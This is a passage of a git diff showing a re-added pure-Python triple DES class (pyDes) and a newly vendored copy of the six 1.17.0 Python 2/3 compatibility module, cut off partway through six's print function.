data = self.__key2.crypt(data, DECRYPT) - return self.__key3.crypt(data, ENCRYPT) - - def decrypt(self, data, pad=None, padmode=None): - """decrypt(data, [pad], [padmode]) -> bytes - - data : bytes to be encrypted - pad : Optional argument for decryption padding. Must only be one byte - padmode : Optional argument for overriding the padding mode. - - The data must be a multiple of 8 bytes and will be decrypted - with the already specified key. In PAD_NORMAL mode, if the - optional padding character is supplied, then the un-encrypted - data will have the padding characters removed from the end of - the bytes. This pad removal only occurs on the last 8 bytes of - the data (last data block). In PAD_PKCS5 mode, the special - padding end markers will be removed from the data after - decrypting, no pad character is required for PAD_PKCS5. - """ - ENCRYPT = des.ENCRYPT - DECRYPT = des.DECRYPT - data = self._guardAgainstUnicode(data) - if pad is not None: - pad = self._guardAgainstUnicode(pad) - if self.getMode() == CBC: - self.__key1.setIV(self.getIV()) - self.__key2.setIV(self.getIV()) - self.__key3.setIV(self.getIV()) - i = 0 - result = [] - while i < len(data): - iv = data[i:i+8] - block = self.__key3.crypt(iv, DECRYPT) - block = self.__key2.crypt(block, ENCRYPT) - block = self.__key1.crypt(block, DECRYPT) - self.__key1.setIV(iv) - self.__key2.setIV(iv) - self.__key3.setIV(iv) - result.append(block) - i += 8 - if _pythonMajorVersion < 3: - data = ''.join(result) - else: - data = bytes.fromhex('').join(result) - else: - data = self.__key3.crypt(data, DECRYPT) - data = self.__key2.crypt(data, ENCRYPT) - data = self.__key1.crypt(data, DECRYPT) - return self._unpadData(data, pad, padmode) + """Triple DES encryption/decrytpion class + + This algorithm uses the DES-EDE3 (when a 24 byte key is supplied) or + the DES-EDE2 (when a 16 byte key is supplied) encryption methods. + Supports ECB (Electronic Code Book) and CBC (Cypher Block Chaining) modes. + + pyDes.des(key, [mode], [IV]) + + key -> Bytes containing the encryption key, must be either 16 or + 24 bytes long + mode -> Optional argument for encryption type, can be either pyDes.ECB + (Electronic Code Book), pyDes.CBC (Cypher Block Chaining) + IV -> Optional Initial Value bytes, must be supplied if using CBC mode. + Must be 8 bytes in length. + pad -> Optional argument, set the pad character (PAD_NORMAL) to use + during all encrypt/decrpt operations done with this instance. + padmode -> Optional argument, set the padding mode (PAD_NORMAL or + PAD_PKCS5) to use during all encrypt/decrpt operations done + with this instance. + """ + def __init__(self, key, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL): + _baseDes.__init__(self, mode, IV, pad, padmode) + self.setKey(key) + + def setKey(self, key): + """Will set the crypting key for this object. Either 16 or 24 bytes long.""" + self.key_size = 24 # Use DES-EDE3 mode + if len(key) != self.key_size: + if len(key) == 16: # Use DES-EDE2 mode + self.key_size = 16 + else: + raise ValueError("Invalid triple DES key size. Key must be either 16 or 24 bytes long") + if self.getMode() == CBC: + if not self.getIV(): + # Use the first 8 bytes of the key + self._iv = key[:self.block_size] + if len(self.getIV()) != self.block_size: + raise ValueError("Invalid IV, must be 8 bytes in length") + self.__key1 = des(key[:8], self._mode, self._iv, + self._padding, self._padmode) + self.__key2 = des(key[8:16], self._mode, self._iv, + self._padding, self._padmode) + if self.key_size == 16: + self.__key3 = self.__key1 + else: + self.__key3 = des(key[16:], self._mode, self._iv, + self._padding, self._padmode) + _baseDes.setKey(self, key) + + # Override setter methods to work on all 3 keys. + + def setMode(self, mode): + """Sets the type of crypting mode, pyDes.ECB or pyDes.CBC""" + _baseDes.setMode(self, mode) + for key in (self.__key1, self.__key2, self.__key3): + key.setMode(mode) + + def setPadding(self, pad): + """setPadding() -> bytes of length 1. Padding character.""" + _baseDes.setPadding(self, pad) + for key in (self.__key1, self.__key2, self.__key3): + key.setPadding(pad) + + def setPadMode(self, mode): + """Sets the type of padding mode, pyDes.PAD_NORMAL or pyDes.PAD_PKCS5""" + _baseDes.setPadMode(self, mode) + for key in (self.__key1, self.__key2, self.__key3): + key.setPadMode(mode) + + def setIV(self, IV): + """Will set the Initial Value, used in conjunction with CBC mode""" + _baseDes.setIV(self, IV) + for key in (self.__key1, self.__key2, self.__key3): + key.setIV(IV) + + def encrypt(self, data, pad=None, padmode=None): + """encrypt(data, [pad], [padmode]) -> bytes + + data : bytes to be encrypted + pad : Optional argument for encryption padding. Must only be one byte + padmode : Optional argument for overriding the padding mode. + + The data must be a multiple of 8 bytes and will be encrypted + with the already specified key. Data does not have to be a + multiple of 8 bytes if the padding character is supplied, or + the padmode is set to PAD_PKCS5, as bytes will then added to + ensure the be padded data is a multiple of 8 bytes. + """ + ENCRYPT = des.ENCRYPT + DECRYPT = des.DECRYPT + data = self._guardAgainstUnicode(data) + if pad is not None: + pad = self._guardAgainstUnicode(pad) + # Pad the data accordingly. + data = self._padData(data, pad, padmode) + if self.getMode() == CBC: + self.__key1.setIV(self.getIV()) + self.__key2.setIV(self.getIV()) + self.__key3.setIV(self.getIV()) + i = 0 + result = [] + while i < len(data): + block = self.__key1.crypt(data[i:i+8], ENCRYPT) + block = self.__key2.crypt(block, DECRYPT) + block = self.__key3.crypt(block, ENCRYPT) + self.__key1.setIV(block) + self.__key2.setIV(block) + self.__key3.setIV(block) + result.append(block) + i += 8 + if _pythonMajorVersion < 3: + return ''.join(result) + else: + return bytes.fromhex('').join(result) + else: + data = self.__key1.crypt(data, ENCRYPT) + data = self.__key2.crypt(data, DECRYPT) + return self.__key3.crypt(data, ENCRYPT) + + def decrypt(self, data, pad=None, padmode=None): + """decrypt(data, [pad], [padmode]) -> bytes + + data : bytes to be encrypted + pad : Optional argument for decryption padding. Must only be one byte + padmode : Optional argument for overriding the padding mode. + + The data must be a multiple of 8 bytes and will be decrypted + with the already specified key. In PAD_NORMAL mode, if the + optional padding character is supplied, then the un-encrypted + data will have the padding characters removed from the end of + the bytes. This pad removal only occurs on the last 8 bytes of + the data (last data block). In PAD_PKCS5 mode, the special + padding end markers will be removed from the data after + decrypting, no pad character is required for PAD_PKCS5. + """ + ENCRYPT = des.ENCRYPT + DECRYPT = des.DECRYPT + data = self._guardAgainstUnicode(data) + if pad is not None: + pad = self._guardAgainstUnicode(pad) + if self.getMode() == CBC: + self.__key1.setIV(self.getIV()) + self.__key2.setIV(self.getIV()) + self.__key3.setIV(self.getIV()) + i = 0 + result = [] + while i < len(data): + iv = data[i:i+8] + block = self.__key3.crypt(iv, DECRYPT) + block = self.__key2.crypt(block, ENCRYPT) + block = self.__key1.crypt(block, DECRYPT) + self.__key1.setIV(iv) + self.__key2.setIV(iv) + self.__key3.setIV(iv) + result.append(block) + i += 8 + if _pythonMajorVersion < 3: + data = ''.join(result) + else: + data = bytes.fromhex('').join(result) + else: + data = self.__key3.crypt(data, DECRYPT) + data = self.__key2.crypt(data, ENCRYPT) + data = self.__key1.crypt(data, DECRYPT) + return self._unpadData(data, pad, padmode) diff --git a/thirdparty/six/__init__.py b/thirdparty/six/__init__.py new file mode 100644 index 00000000000..3de5969b1ad --- /dev/null +++ b/thirdparty/six/__init__.py @@ -0,0 +1,1003 @@ +# Copyright (c) 2010-2024 Benjamin Peterson +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Utilities for writing code that runs on Python 2 and 3""" + +from __future__ import absolute_import + +import functools +import itertools +import operator +import sys +import types + +__author__ = "Benjamin Peterson " +__version__ = "1.17.0" + + +# Useful for very coarse version differentiation. +PY2 = sys.version_info[0] == 2 +PY3 = sys.version_info[0] == 3 +PY34 = sys.version_info[0:2] >= (3, 4) + +if PY3: + string_types = str, + integer_types = int, + class_types = type, + text_type = str + binary_type = bytes + + MAXSIZE = sys.maxsize +else: + string_types = basestring, + integer_types = (int, long) + class_types = (type, types.ClassType) + text_type = unicode + binary_type = str + + if sys.platform.startswith("java"): + # Jython always uses 32 bits. + MAXSIZE = int((1 << 31) - 1) + else: + # It's possible to have sizeof(long) != sizeof(Py_ssize_t). + class X(object): + + def __len__(self): + return 1 << 31 + try: + len(X()) + except OverflowError: + # 32-bit + MAXSIZE = int((1 << 31) - 1) + else: + # 64-bit + MAXSIZE = int((1 << 63) - 1) + del X + +if PY34: + from importlib.util import spec_from_loader +else: + spec_from_loader = None + + +def _add_doc(func, doc): + """Add documentation to a function.""" + func.__doc__ = doc + + +def _import_module(name): + """Import module, returning the module after the last dot.""" + __import__(name) + return sys.modules[name] + + +class _LazyDescr(object): + + def __init__(self, name): + self.name = name + + def __get__(self, obj, tp): + result = self._resolve() + setattr(obj, self.name, result) # Invokes __set__. + try: + # This is a bit ugly, but it avoids running this again by + # removing this descriptor. + delattr(obj.__class__, self.name) + except AttributeError: + pass + return result + + +class MovedModule(_LazyDescr): + + def __init__(self, name, old, new=None): + super(MovedModule, self).__init__(name) + if PY3: + if new is None: + new = name + self.mod = new + else: + self.mod = old + + def _resolve(self): + return _import_module(self.mod) + + def __getattr__(self, attr): + _module = self._resolve() + value = getattr(_module, attr) + setattr(self, attr, value) + return value + + +class _LazyModule(types.ModuleType): + + def __init__(self, name): + super(_LazyModule, self).__init__(name) + self.__doc__ = self.__class__.__doc__ + + def __dir__(self): + attrs = ["__doc__", "__name__"] + attrs += [attr.name for attr in self._moved_attributes] + return attrs + + # Subclasses should override this + _moved_attributes = [] + + +class MovedAttribute(_LazyDescr): + + def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None): + super(MovedAttribute, self).__init__(name) + if PY3: + if new_mod is None: + new_mod = name + self.mod = new_mod + if new_attr is None: + if old_attr is None: + new_attr = name + else: + new_attr = old_attr + self.attr = new_attr + else: + self.mod = old_mod + if old_attr is None: + old_attr = name + self.attr = old_attr + + def _resolve(self): + module = _import_module(self.mod) + return getattr(module, self.attr) + + +class _SixMetaPathImporter(object): + + """ + A meta path importer to import six.moves and its submodules. + + This class implements a PEP302 finder and loader. It should be compatible + with Python 2.5 and all existing versions of Python3 + """ + + def __init__(self, six_module_name): + self.name = six_module_name + self.known_modules = {} + + def _add_module(self, mod, *fullnames): + for fullname in fullnames: + self.known_modules[self.name + "." + fullname] = mod + + def _get_module(self, fullname): + return self.known_modules[self.name + "." + fullname] + + def find_module(self, fullname, path=None): + if fullname in self.known_modules: + return self + return None + + def find_spec(self, fullname, path, target=None): + if fullname in self.known_modules: + return spec_from_loader(fullname, self) + return None + + def __get_module(self, fullname): + try: + return self.known_modules[fullname] + except KeyError: + raise ImportError("This loader does not know module " + fullname) + + def load_module(self, fullname): + try: + # in case of a reload + return sys.modules[fullname] + except KeyError: + pass + mod = self.__get_module(fullname) + if isinstance(mod, MovedModule): + mod = mod._resolve() + else: + mod.__loader__ = self + sys.modules[fullname] = mod + return mod + + def is_package(self, fullname): + """ + Return true, if the named module is a package. + + We need this method to get correct spec objects with + Python 3.4 (see PEP451) + """ + return hasattr(self.__get_module(fullname), "__path__") + + def get_code(self, fullname): + """Return None + + Required, if is_package is implemented""" + self.__get_module(fullname) # eventually raises ImportError + return None + get_source = get_code # same as get_code + + def create_module(self, spec): + return self.load_module(spec.name) + + def exec_module(self, module): + pass + +_importer = _SixMetaPathImporter(__name__) + + +class _MovedItems(_LazyModule): + + """Lazy loading of moved objects""" + __path__ = [] # mark as package + + +_moved_attributes = [ + MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"), + MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"), + MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"), + MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"), + MovedAttribute("intern", "__builtin__", "sys"), + MovedAttribute("map", "itertools", "builtins", "imap", "map"), + MovedAttribute("getcwd", "os", "os", "getcwdu", "getcwd"), + MovedAttribute("getcwdb", "os", "os", "getcwd", "getcwdb"), + MovedAttribute("getoutput", "commands", "subprocess"), + MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"), + MovedAttribute("reload_module", "__builtin__", "importlib" if PY34 else "imp", "reload"), + MovedAttribute("reduce", "__builtin__", "functools"), + MovedAttribute("shlex_quote", "pipes", "shlex", "quote"), + MovedAttribute("StringIO", "StringIO", "io"), + MovedAttribute("UserDict", "UserDict", "collections", "IterableUserDict", "UserDict"), + MovedAttribute("UserList", "UserList", "collections"), + MovedAttribute("UserString", "UserString", "collections"), + MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"), + MovedAttribute("zip", "itertools", "builtins", "izip", "zip"), + MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"), + MovedModule("builtins", "__builtin__"), + MovedModule("configparser", "ConfigParser"), + MovedModule("collections_abc", "collections", "collections.abc" if sys.version_info >= (3, 3) else "collections"), + MovedModule("copyreg", "copy_reg"), + MovedModule("dbm_gnu", "gdbm", "dbm.gnu"), + MovedModule("dbm_ndbm", "dbm", "dbm.ndbm"), + MovedModule("_dummy_thread", "dummy_thread", "_dummy_thread" if sys.version_info < (3, 9) else "_thread"), + MovedModule("http_cookiejar", "cookielib", "http.cookiejar"), + MovedModule("http_cookies", "Cookie", "http.cookies"), + MovedModule("html_entities", "htmlentitydefs", "html.entities"), + MovedModule("html_parser", "HTMLParser", "html.parser"), + MovedModule("http_client", "httplib", "http.client"), + MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"), + MovedModule("email_mime_image", "email.MIMEImage", "email.mime.image"), + MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"), + MovedModule("email_mime_nonmultipart", "email.MIMENonMultipart", "email.mime.nonmultipart"), + MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"), + MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"), + MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"), + MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"), + MovedModule("cPickle", "cPickle", "pickle"), + MovedModule("queue", "Queue"), + MovedModule("reprlib", "repr"), + MovedModule("socketserver", "SocketServer"), + MovedModule("_thread", "thread", "_thread"), + MovedModule("tkinter", "Tkinter"), + MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"), + MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"), + MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"), + MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"), + MovedModule("tkinter_tix", "Tix", "tkinter.tix"), + MovedModule("tkinter_ttk", "ttk", "tkinter.ttk"), + MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"), + MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"), + MovedModule("tkinter_colorchooser", "tkColorChooser", + "tkinter.colorchooser"), + MovedModule("tkinter_commondialog", "tkCommonDialog", + "tkinter.commondialog"), + MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"), + MovedModule("tkinter_font", "tkFont", "tkinter.font"), + MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"), + MovedModule("tkinter_tksimpledialog", "tkSimpleDialog", + "tkinter.simpledialog"), + MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"), + MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"), + MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"), + MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"), + MovedModule("xmlrpc_client", "xmlrpclib", "xmlrpc.client"), + MovedModule("xmlrpc_server", "SimpleXMLRPCServer", "xmlrpc.server"), +] +# Add windows specific modules. +if sys.platform == "win32": + _moved_attributes += [ + MovedModule("winreg", "_winreg"), + ] + +for attr in _moved_attributes: + setattr(_MovedItems, attr.name, attr) + if isinstance(attr, MovedModule): + _importer._add_module(attr, "moves." + attr.name) +del attr + +_MovedItems._moved_attributes = _moved_attributes + +moves = _MovedItems(__name__ + ".moves") +_importer._add_module(moves, "moves") + + +class Module_six_moves_urllib_parse(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_parse""" + + +_urllib_parse_moved_attributes = [ + MovedAttribute("ParseResult", "urlparse", "urllib.parse"), + MovedAttribute("SplitResult", "urlparse", "urllib.parse"), + MovedAttribute("parse_qs", "urlparse", "urllib.parse"), + MovedAttribute("parse_qsl", "urlparse", "urllib.parse"), + MovedAttribute("urldefrag", "urlparse", "urllib.parse"), + MovedAttribute("urljoin", "urlparse", "urllib.parse"), + MovedAttribute("urlparse", "urlparse", "urllib.parse"), + MovedAttribute("urlsplit", "urlparse", "urllib.parse"), + MovedAttribute("urlunparse", "urlparse", "urllib.parse"), + MovedAttribute("urlunsplit", "urlparse", "urllib.parse"), + MovedAttribute("quote", "urllib", "urllib.parse"), + MovedAttribute("quote_plus", "urllib", "urllib.parse"), + MovedAttribute("unquote", "urllib", "urllib.parse"), + MovedAttribute("unquote_plus", "urllib", "urllib.parse"), + MovedAttribute("unquote_to_bytes", "urllib", "urllib.parse", "unquote", "unquote_to_bytes"), + MovedAttribute("urlencode", "urllib", "urllib.parse"), + MovedAttribute("splitquery", "urllib", "urllib.parse"), + MovedAttribute("splittag", "urllib", "urllib.parse"), + MovedAttribute("splituser", "urllib", "urllib.parse"), + MovedAttribute("splitvalue", "urllib", "urllib.parse"), + MovedAttribute("uses_fragment", "urlparse", "urllib.parse"), + MovedAttribute("uses_netloc", "urlparse", "urllib.parse"), + MovedAttribute("uses_params", "urlparse", "urllib.parse"), + MovedAttribute("uses_query", "urlparse", "urllib.parse"), + MovedAttribute("uses_relative", "urlparse", "urllib.parse"), +] +for attr in _urllib_parse_moved_attributes: + setattr(Module_six_moves_urllib_parse, attr.name, attr) +del attr + +Module_six_moves_urllib_parse._moved_attributes = _urllib_parse_moved_attributes + +_importer._add_module(Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse"), + "moves.urllib_parse", "moves.urllib.parse") + + +class Module_six_moves_urllib_error(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_error""" + + +_urllib_error_moved_attributes = [ + MovedAttribute("URLError", "urllib2", "urllib.error"), + MovedAttribute("HTTPError", "urllib2", "urllib.error"), + MovedAttribute("ContentTooShortError", "urllib", "urllib.error"), +] +for attr in _urllib_error_moved_attributes: + setattr(Module_six_moves_urllib_error, attr.name, attr) +del attr + +Module_six_moves_urllib_error._moved_attributes = _urllib_error_moved_attributes + +_importer._add_module(Module_six_moves_urllib_error(__name__ + ".moves.urllib.error"), + "moves.urllib_error", "moves.urllib.error") + + +class Module_six_moves_urllib_request(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_request""" + + +_urllib_request_moved_attributes = [ + MovedAttribute("urlopen", "urllib2", "urllib.request"), + MovedAttribute("install_opener", "urllib2", "urllib.request"), + MovedAttribute("build_opener", "urllib2", "urllib.request"), + MovedAttribute("pathname2url", "urllib", "urllib.request"), + MovedAttribute("url2pathname", "urllib", "urllib.request"), + MovedAttribute("getproxies", "urllib", "urllib.request"), + MovedAttribute("Request", "urllib2", "urllib.request"), + MovedAttribute("OpenerDirector", "urllib2", "urllib.request"), + MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"), + MovedAttribute("ProxyHandler", "urllib2", "urllib.request"), + MovedAttribute("BaseHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"), + MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"), + MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"), + MovedAttribute("FileHandler", "urllib2", "urllib.request"), + MovedAttribute("FTPHandler", "urllib2", "urllib.request"), + MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"), + MovedAttribute("UnknownHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"), + MovedAttribute("urlretrieve", "urllib", "urllib.request"), + MovedAttribute("urlcleanup", "urllib", "urllib.request"), + MovedAttribute("proxy_bypass", "urllib", "urllib.request"), + MovedAttribute("parse_http_list", "urllib2", "urllib.request"), + MovedAttribute("parse_keqv_list", "urllib2", "urllib.request"), +] +if sys.version_info[:2] < (3, 14): + _urllib_request_moved_attributes.extend( + [ + MovedAttribute("URLopener", "urllib", "urllib.request"), + MovedAttribute("FancyURLopener", "urllib", "urllib.request"), + ] + ) +for attr in _urllib_request_moved_attributes: + setattr(Module_six_moves_urllib_request, attr.name, attr) +del attr + +Module_six_moves_urllib_request._moved_attributes = _urllib_request_moved_attributes + +_importer._add_module(Module_six_moves_urllib_request(__name__ + ".moves.urllib.request"), + "moves.urllib_request", "moves.urllib.request") + + +class Module_six_moves_urllib_response(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_response""" + + +_urllib_response_moved_attributes = [ + MovedAttribute("addbase", "urllib", "urllib.response"), + MovedAttribute("addclosehook", "urllib", "urllib.response"), + MovedAttribute("addinfo", "urllib", "urllib.response"), + MovedAttribute("addinfourl", "urllib", "urllib.response"), +] +for attr in _urllib_response_moved_attributes: + setattr(Module_six_moves_urllib_response, attr.name, attr) +del attr + +Module_six_moves_urllib_response._moved_attributes = _urllib_response_moved_attributes + +_importer._add_module(Module_six_moves_urllib_response(__name__ + ".moves.urllib.response"), + "moves.urllib_response", "moves.urllib.response") + + +class Module_six_moves_urllib_robotparser(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_robotparser""" + + +_urllib_robotparser_moved_attributes = [ + MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"), +] +for attr in _urllib_robotparser_moved_attributes: + setattr(Module_six_moves_urllib_robotparser, attr.name, attr) +del attr + +Module_six_moves_urllib_robotparser._moved_attributes = _urllib_robotparser_moved_attributes + +_importer._add_module(Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser"), + "moves.urllib_robotparser", "moves.urllib.robotparser") + + +class Module_six_moves_urllib(types.ModuleType): + + """Create a six.moves.urllib namespace that resembles the Python 3 namespace""" + __path__ = [] # mark as package + parse = _importer._get_module("moves.urllib_parse") + error = _importer._get_module("moves.urllib_error") + request = _importer._get_module("moves.urllib_request") + response = _importer._get_module("moves.urllib_response") + robotparser = _importer._get_module("moves.urllib_robotparser") + + def __dir__(self): + return ['parse', 'error', 'request', 'response', 'robotparser'] + +_importer._add_module(Module_six_moves_urllib(__name__ + ".moves.urllib"), + "moves.urllib") + + +def add_move(move): + """Add an item to six.moves.""" + setattr(_MovedItems, move.name, move) + + +def remove_move(name): + """Remove item from six.moves.""" + try: + delattr(_MovedItems, name) + except AttributeError: + try: + del moves.__dict__[name] + except KeyError: + raise AttributeError("no such move, %r" % (name,)) + + +if PY3: + _meth_func = "__func__" + _meth_self = "__self__" + + _func_closure = "__closure__" + _func_code = "__code__" + _func_defaults = "__defaults__" + _func_globals = "__globals__" +else: + _meth_func = "im_func" + _meth_self = "im_self" + + _func_closure = "func_closure" + _func_code = "func_code" + _func_defaults = "func_defaults" + _func_globals = "func_globals" + + +try: + advance_iterator = next +except NameError: + def advance_iterator(it): + return it.next() +next = advance_iterator + + +try: + callable = callable +except NameError: + def callable(obj): + return any("__call__" in klass.__dict__ for klass in type(obj).__mro__) + + +if PY3: + def get_unbound_function(unbound): + return unbound + + create_bound_method = types.MethodType + + def create_unbound_method(func, cls): + return func + + Iterator = object +else: + def get_unbound_function(unbound): + return unbound.im_func + + def create_bound_method(func, obj): + return types.MethodType(func, obj, obj.__class__) + + def create_unbound_method(func, cls): + return types.MethodType(func, None, cls) + + class Iterator(object): + + def next(self): + return type(self).__next__(self) + + callable = callable +_add_doc(get_unbound_function, + """Get the function out of a possibly unbound function""") + + +get_method_function = operator.attrgetter(_meth_func) +get_method_self = operator.attrgetter(_meth_self) +get_function_closure = operator.attrgetter(_func_closure) +get_function_code = operator.attrgetter(_func_code) +get_function_defaults = operator.attrgetter(_func_defaults) +get_function_globals = operator.attrgetter(_func_globals) + + +if PY3: + def iterkeys(d, **kw): + return iter(d.keys(**kw)) + + def itervalues(d, **kw): + return iter(d.values(**kw)) + + def iteritems(d, **kw): + return iter(d.items(**kw)) + + def iterlists(d, **kw): + return iter(d.lists(**kw)) + + viewkeys = operator.methodcaller("keys") + + viewvalues = operator.methodcaller("values") + + viewitems = operator.methodcaller("items") +else: + def iterkeys(d, **kw): + return d.iterkeys(**kw) + + def itervalues(d, **kw): + return d.itervalues(**kw) + + def iteritems(d, **kw): + return d.iteritems(**kw) + + def iterlists(d, **kw): + return d.iterlists(**kw) + + viewkeys = operator.methodcaller("viewkeys") + + viewvalues = operator.methodcaller("viewvalues") + + viewitems = operator.methodcaller("viewitems") + +_add_doc(iterkeys, "Return an iterator over the keys of a dictionary.") +_add_doc(itervalues, "Return an iterator over the values of a dictionary.") +_add_doc(iteritems, + "Return an iterator over the (key, value) pairs of a dictionary.") +_add_doc(iterlists, + "Return an iterator over the (key, [values]) pairs of a dictionary.") + + +if PY3: + def b(s): + return s.encode("latin-1") + + def u(s): + return s + unichr = chr + import struct + int2byte = struct.Struct(">B").pack + del struct + byte2int = operator.itemgetter(0) + indexbytes = operator.getitem + iterbytes = iter + import io + StringIO = io.StringIO + BytesIO = io.BytesIO + del io + _assertCountEqual = "assertCountEqual" + if sys.version_info[1] <= 1: + _assertRaisesRegex = "assertRaisesRegexp" + _assertRegex = "assertRegexpMatches" + _assertNotRegex = "assertNotRegexpMatches" + else: + _assertRaisesRegex = "assertRaisesRegex" + _assertRegex = "assertRegex" + _assertNotRegex = "assertNotRegex" +else: + def b(s): + return s + # Workaround for standalone backslash + + def u(s): + return unicode(s.replace(r'\\', r'\\\\'), "unicode_escape") + unichr = unichr + int2byte = chr + + def byte2int(bs): + return ord(bs[0]) + + def indexbytes(buf, i): + return ord(buf[i]) + iterbytes = functools.partial(itertools.imap, ord) + import StringIO + StringIO = BytesIO = StringIO.StringIO + _assertCountEqual = "assertItemsEqual" + _assertRaisesRegex = "assertRaisesRegexp" + _assertRegex = "assertRegexpMatches" + _assertNotRegex = "assertNotRegexpMatches" +_add_doc(b, """Byte literal""") +_add_doc(u, """Text literal""") + + +def assertCountEqual(self, *args, **kwargs): + return getattr(self, _assertCountEqual)(*args, **kwargs) + + +def assertRaisesRegex(self, *args, **kwargs): + return getattr(self, _assertRaisesRegex)(*args, **kwargs) + + +def assertRegex(self, *args, **kwargs): + return getattr(self, _assertRegex)(*args, **kwargs) + + +def assertNotRegex(self, *args, **kwargs): + return getattr(self, _assertNotRegex)(*args, **kwargs) + + +if PY3: + exec_ = getattr(moves.builtins, "exec") + + def reraise(tp, value, tb=None): + try: + if value is None: + value = tp() + if value.__traceback__ is not tb: + raise value.with_traceback(tb) + raise value + finally: + value = None + tb = None + +else: + def exec_(_code_, _globs_=None, _locs_=None): + """Execute code in a namespace.""" + if _globs_ is None: + frame = sys._getframe(1) + _globs_ = frame.f_globals + if _locs_ is None: + _locs_ = frame.f_locals + del frame + elif _locs_ is None: + _locs_ = _globs_ + exec("""exec _code_ in _globs_, _locs_""") + + exec_("""def reraise(tp, value, tb=None): + try: + raise tp, value, tb + finally: + tb = None +""") + + +if sys.version_info[:2] > (3,): + exec_("""def raise_from(value, from_value): + try: + raise value from from_value + finally: + value = None +""") +else: + def raise_from(value, from_value): + raise value + + +print_ = getattr(moves.builtins, "print", None) +if print_ is None: + def print_(*args, **kwargs): + """The new-style print function for Python 2.4 and 2.5.""" + fp = kwargs.pop("file", sys.stdout) + if fp is None: + return + + def write(data): + if not isinstance(data, basestring): + data = str(data) + # If the file has an encoding, encode unicode with it. + if (isinstance(fp, file) and + isinstance(data, unicode) and + fp.encoding is not None): + errors = getattr(fp, "errors", None) + if errors is None: + errors = "strict" + data = data.encode(fp.encoding, errors) + fp.write(data) + want_unicode = False + sep = kwargs.pop("sep", None) + if sep is not None: + if isinstance(sep, unicode): + want_unicode = True + elif not isinstance(sep, str): + raise TypeError("sep must be None or a string") + end = kwargs.pop("end", None) + if end is not None: + if isinstance(end, unicode): + want_unicode = True + elif not isinstance(end, str): + raise TypeError("end must be None or a string") + if kwargs: + raise TypeError("invalid keyword arguments to print()") + if not want_unicode: + for arg in args: + if isinstance(arg, unicode): + want_unicode = True + break + if want_unicode: + newline = unicode("\n") + space = unicode(" ") + else: + newline = "\n" + space = " " + if sep is None: + sep = space + if end is None: + end = newline + for i, arg in enumerate(args): + if i: + write(sep) + write(arg) + write(end) +if sys.version_info[:2] < (3, 3): + _print = print_ + + def print_(*args, **kwargs): + fp = kwargs.get("file", sys.stdout) + flush = 